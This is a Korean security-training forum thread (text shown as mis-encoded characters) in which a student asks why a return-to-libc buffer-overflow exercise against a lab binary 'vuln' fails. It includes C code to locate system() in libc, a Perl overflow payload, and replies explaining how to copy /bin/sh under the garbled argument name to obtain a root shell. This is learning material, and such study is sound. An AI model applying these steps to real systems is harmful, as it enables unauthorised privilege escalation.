½Ã½ºÅÛ ÇØÅ·

 1574, 12/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ygw0225
   BOFÇÚµåºÏ ¸¶Áö¸·½Ç½À¹®Á¦ Áú¹®..

http://www.hackerschool.org/HS_Boards/zboard.php?desc=asc&no=1725 [º¹»ç]


»ç½Ç Àú¿Í°°ÀÌ Áú¹®ÇÑ ±ÛÀÌ Àֱ淡ºÃ´Âµ¥ ´äº¯ÀÌ ¹«½¼¸»ÀÎÁö ¸ô¶ó¼­
°°Àº Áú¹®µå¸³´Ï´Ù.

ÇÚµåºÏÀÇ °­Á°úÁ¤°ú ´Ù¸£°Ô ³ª¿Í ÇöÀç ¸·Èù»óÅÂÀÔ´Ï´Ù ¤Ð¤Ð
--------------------------------------------------

[student@localhost chapter_21]$ /bin/bash2

--------------------------------------------------

--------------------------------------------------

[student@localhost chapter_21]$ export PATH=$PATH:.

--------------------------------------------------

-------------------------------------------------------------

[student@localhost chapter_21]$ cat > addr_of_system.c
#include <dlfcn.h>

int main()
{
   long addr;
   void *handle;

   handle = dlopen("/lib/libc.so.6", RTLD_LAZY);
   addr = (long)dlsym(handle, "system");
   printf("system() is at 0x%x\n", addr);

}
(ÄÁÆ®·²+D ÀÔ·Â)
[student@localhost chapter_21]$
[student@localhost chapter_21]$ gcc -o ./addr_of_system addr_of_system.c -lc -ldl
[student@localhost chapter_21]$ ./addr_of_system
system() is at 0x40058ae0
[student@localhost chapter_21]$

--------------------------------------------------------------

-> systemÀÇ ÁÖ¼Ò¸¦ ¾Ë¾Æ³½ µÚ
----------------------------------------------------------------------------------------------------------

[student@localhost chapter_21]$ ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'`
your input is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?@
sh: ?¿C?? command not found
Segmentation fault
[student@localhost chapter_21]$

----------------------------------------------------------------------------------------------------------

À§¿¡ ¸í·ÉÀ» ÃÆÀ»¶§ °­Á¿¡¼­´Â À§ ó·³ ¶ß´Âµ¥ ¹ÝÇØ Àú´Â ¾Æ·¡¿Í°°Àº ¹®±¸°¡ ¶å´Ï´Ù.

your input is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(ÀÌ»óÇÑ ¹®ÀÚ)
sh: syntax error near unexpercted token '(ÀÌ»óÇѹ®ÀÚ)'
sh: -c: line 1: '(ÀÌ»óÇѹ®ÀÚ)'
Segmentation fault

¾î¶»°Ô ÇØ¾ß °­ÁÂó·³ µÉ ±î¿ä?
  Hit : 3393     Date : 2014/01/08 01:34


    
cd80 ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` > ./asdfasdf ÇϽŴÙÀ½¿¡
xxd ./asdfasdf ¿¡¼­ ¸»¾¸ÇϽŠÀÌ»óÇѹ®ÀÚÀÇ Çí½º¿­À» ãÀ¸½Å´ÙÀ½¿¡
cp /bin/sh $(perl -e 'print "\x~~\x~~\x~~"') ÀÌ·±½ÄÀ¸·Î /bin/sh¸¦ ±× ÀÌ»óÇѹ®ÀÚ·Î º¹»çÇϽŴÙÀ½¿¡
export .:$PATH ÇÏ½Ã°í ´Ù½Ã
./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'`
Çغ¸¼¼¿ä		 2014/01/08  
ygw0225 ¿Í¿ì °¨»çÇÕ´Ï´Ù! ¸»¾¸ÇϽŴë·Î ÇÏ°í³ª¼­ root½©À» ȹµæÇÏ°Ô µÇ¾ú½À´Ï´Ù.
±×·±µ¥ Á¦°¡ ¿Ïº®ÇÏ°Ô ÀÌÇظ¦ ÇÏÁö¸øÇÏ¿´½À´Ï´Ù; Áú¹® ¸î°¡Áöµå¸®°Ú½À´Ï´Ù.

1. À§´ñ±Û·Î ¸»¾¸ÇØÁֽŠÇØ°áÃ¥À» ¶È°°ÀÌ ÇÏ¿´´Âµ¥¿ä ¸»¾¸ÇϽŴë·Î ÇÏ°í³ª¼­ ´Ù¼¸¹ø°ÁÙ(À§´ñ±Û¿¡¼­)
./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` ÀÔ·ÂÇÏ¸é ¹Ù·Î root½©À» ȹµæÇÏ°Ô µÇ´Â°Ç°¡¿ä
¾Æ´Ï¸é syntax error ¸¦ sh: ?¿C?? command not found ·Î °­Á¿¡¼­Ã³·³ ³ª¿À°Ô ÇϱâÀ§ÇÑ °úÁ¤Àΰ¡¿ä?
¸»¾¸ÇϽŴë·Î µû¶óÇÏ°í³ª´Ï sh: ?¿C?? command not found ·Î ³ª¿Í¼­ system()»çÀÌ¿¡ Çí½º¿­À» È®ÀÎÇؼ­
¸µÅ©ÆÄÀÏÀ» ¸¸µé¾î ¿¬°á½ÃÄÑ È®ÀÎÀ»Çß½À´Ï´Ù...°á±¹ °°Àº°ÍÀ» ¹Ýº¹ÇØ¾ß Çϴ°ǰ¡¿ä?

2. ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` > ./asdfasdf ÀÌ·¸°Ô ÇÒ°æ¿ì ÆÄÀÏÀº ¸¸µé¾îÁö´Âµ¥
xxd asdfasdf ÇÏ¸é ¾Æ¹«°Íµµ ¾È¶å´Ï´Ù 2>asdfasdf .. ±×·¯´Ï±î 2¸¦ ¾Õ¿¡ ºÙ¿©¾ß xxd·Î ÇÒ¶§ Á¦´ë·Î º¸ÀÌ´õ±º¿ä ¹«½¼Â÷ÀÌ°¡Àִ°ÅÁÒ?

3. ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` ¿¡¼­ x84¿Í "\xe...»çÀÌ¿¡ÀÖ´Â . (Á¡) ÀÌ°Ô ¹«½¼ÀǹÌÀÌÁÒ?
 2014/01/08  
cd80 1.
ù¹ø° ./vuln ~~~~ Àº sh: ?¿C?? command not found°¡ Æ÷ÇÔµÈ ¿¡·¯¸Þ¼¼Áö¸¦ asdfasdf¿¡ ³Ö´Â ¸í·ÉÀÌ°í
ÀÌ sh: ¿Í command »çÀÌ¿¡ ÀÖ´Â ±úÁø ¹®ÀÚ°¡ ½ÇÁ¦·Î system()ÇÔ¼öÀÇ ÀÎÀÚ·Î µé¾î°¡ ÇÁ·Î±×·¥¸íÀ¸·Î ½ÇÇàÇÏ·Á´Ù ½ÇÆÐÇÑ ¹®ÀÚ¿­ÀÔ´Ï´Ù
µû¶ó¼­ ½ÇÁ¦·Î ÀÌ ¹®ÀÚ¿­·Î ÇÁ·Î±×·¥À» ¸¸µé¾î ½ÇÇàÇÒ¼ö ÀÖµµ·Ï ÇÕ´Ï´Ù

»ç¿ëÇÏ°í °è½Å ¹æ¹ýÀ¸·Î °ø°ÝÇÒ¶© °°Àº °úÁ¤À» ¹Ýº¹ÇØ¾ß ÇÕ´Ï´Ù
Áö±Ý »ç¿ëÇÏ°í °è½Å ±â¹ýÀ» RTLÀ̶ó°í Çϴµ¥
https://research.hackerschool.org:8080/Datas/Research_Lecture/[6%C2%F7]_Return_to_Lib_%B1%E2%B9%FD_%C0%CC%C7%D8%C7%CF%B1%E2.txt
À̹®¼­³ª ±¸±Û¿¡ "rtl °ø°Ý" À̶ó°í °Ë»öÇÏ½Ã¸é ³ª¿À´Â ¹®¼­³ª ±ÛµéÀ» º¸½Ã¸é¼­ °øºÎÇϽøé ÁÁ½À´Ï´Ù
https://research.hackerschool.org:8080/Html/WG_Documents.html
¿©±â¿¡ ½Ã½ºÅÛÇØÅ· °ü·Ã¹®¼­°¡ ¸¹À¸´Ï Âü°íÇϼ¼¿ä~

2.
¾Æ 2>¸¦ ÇÑ°Ç stderr¸¦ ¸®´ÙÀÌ·º¼ÇÇϱâ À§Çؼ­ ¿´½À´Ï´Ù
¸®´ª½º¿¡¼­ fd ¼¼°³°¡ Á¤ÇØÁø¿ëµµ·Î ¾²À̴µ¥
0Àº stdin, 1Àº stdout, 2´Â stderrÀÔ´Ï´Ù
¿¡·¯¸Þ¼¼Áö¿¡ ÇÁ·Î±×·¥¸íÀÌ ÀÖÀ¸´Ï stderr¸¦ ¸®´ÙÀÌ·º¼Ç ÇؾßÇÕ¤¤µð¤¿

3. Á¡Àº À߸ø½è³×¿ä ¤»¤» Á¡À¸·Îµµ µÇ±ä Çϴµ¥
¹®ÀÚ¿­ µÎ°³¸¦ À̾îÁÖ´Â ¹®¹ýÀÔ´Ï´Ù
½°Ç¥·Îµµ µÇ°í Á¡À¸·Îµµ µË´Ï´Ù		 2014/01/11  
ygw0225 cd80´Ô!//Á¤¸»°¨»çÇÕ´Ï´Ù...Â÷±ÙÂ÷±Ù Çϳª¾¿ ¹è¿ì·Á°íÇϴµ¥, ¿ª½Ã ½±Áø¾Ê³×¿ä^^; 2014/01/11  
1354   ¹öÆÛ ¿À¹öÇ÷ο쿡 °üÇÑ Áú¹®ÀÔ´Ï´Ù. µµ¿òºÎŹµå·Á¿ä[6]     APlusHacker
 02/08 3865
1353   ¹öÆÛ¿À¹öÇ÷οì[3]     khs790809
 01/31 3271
1352   ¸®´ª½º RELRO Áú¹®ÀÌ¿ä~[2]     cpcp77
 01/21 4525
1351   ½ºÅÿ¡ ASLRÀÌ °É·ÁÀÖÀ¸¸é...???[3]     ygw0225
 01/17 3854
  BOFÇÚµåºÏ ¸¶Áö¸·½Ç½À¹®Á¦ Áú¹®..[4]     ygw0225
 01/08 3392
1349   À©µµ¿ìÁî ȯ°æ¿¡¼­ÀÇ setuid?[3]     namjmnam
 12/31 2657
1348   level12¹®Á¦ esp °è¼Ó ¹Ù²ñ?? (level11¿¡¼­µµ...)[1]     wlghks
 12/15 3199
1347   ¸®¸ðÆ® ¾îÅà    kumi123
 12/11 3478
1346   Æäµµ¶ó ¿øÁ¤´ë 3 gate ¹®Á¦ Áú¹®ÀÔ´Ï´Ù.[1]     Deferto
 11/30 3297
1345   ´ëÇб³ BOF°­Á ¹«ÀÓ½ÂÂ÷Æí[4]     shdac
 11/28 3456
1344   ¾È³çÇϼ¼¿ä ÇØÅ·¿¡ °ü·ÃµÈ ÇÁ·ÎÁ§Æ®¸¦ ÇÏ°í½Í½À´Ï´Ù.     kespy7
 11/17 2847
1343   ¹éÆ®·º     happyfran67
 11/14 3746
1342   ftz level11À» Ç®°í Àִµ¥¿ä..[1]     kost0806
 11/13 3185
1341   ¾Æ½ºÅ°¾Æ¸Ó°¡ °É·ÁÀÕÁö ¾ÊÀºµ¥..[1]     kumi123
 11/09 3562
1340   À©µµ¿ì »ó¿¡¼­ÀÇ ¹öÆÛ¿À¹öÇ÷οì (0xff¿¡´ëÇÑÁú¹®)[1]     Deferto
 11/04 3449
1339   ¾ÆÀ̵𰡠ũ·¢µÆ¾î¿ä, Çù¹Ú¸ÞÀÏÀÌ ¿Ô½À´Ï´Ù..[1]     Raice
 11/01 3602
1338   ¹öÆÛ ¿À¹öÇÃ·Î¿ì ¿ÕÃʺ¸Æí[1]     heach23
 10/03 3385
1337   Æäµµ¶ó 10 ¿À·ù°¡ os ÀÚü ¹®Á¦ÀÎÁö... À̹ÌÁö¹®Á¦ÀÎÁö....     kumi123
 10/02 3137
1336   ¹¹ºÎÅÍ ¹è¿öº¸´Â°Ô ÁÁÀ»±î¿ä?     xkdlrjxkdltm
 09/14 3271
1335   ¹öÆÛ ¿À¹ö Ç÷οì print¿Í printf ÀÇ Â÷ÀÌ[2]     xkdlrjxkdltm
 09/05 3933
[1]..[11] 12 [13][14][15][16][17][18][19][20]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org